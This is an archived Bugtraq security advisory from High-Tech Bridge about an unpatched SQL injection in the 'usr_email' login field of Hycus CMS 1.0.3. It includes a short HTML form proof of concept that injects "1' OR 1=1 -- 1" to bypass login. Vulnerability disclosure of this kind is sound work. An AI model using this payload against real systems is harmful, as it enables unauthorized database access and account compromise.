Bugtraq mailing list archives

SQL injection in Hycus CMS


From: advisory () htbridge ch
Date: Tue, 21 Dec 2010 11:38:14 +0100 (CET)

Vulnerability ID: HTB22739
Reference: http://www.htbridge.ch/advisory/sql_injection_in_hycus_cms_1.html
Product: Hycus CMS
Vendor: Hycus Web Development Team ( http://www.hycus.com/ ) 
Vulnerable Version: 1.0.3
Vendor Notification: 07 December 2010 
Vulnerability Type: SQL Injection
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in 
"usr_email" variable.
Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the 
application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.

The following PoC is available:


<form action="http://[host]/?user/1/hlogin.html"; method="post" name="main" >
<input type="hidden" name="usr_email" value="1' OR 1=1 -- 1"/>
<input type="hidden" name="pwd" value="any"/>
<input type="submit" value="submit" name="submit" />
</form>




Current thread: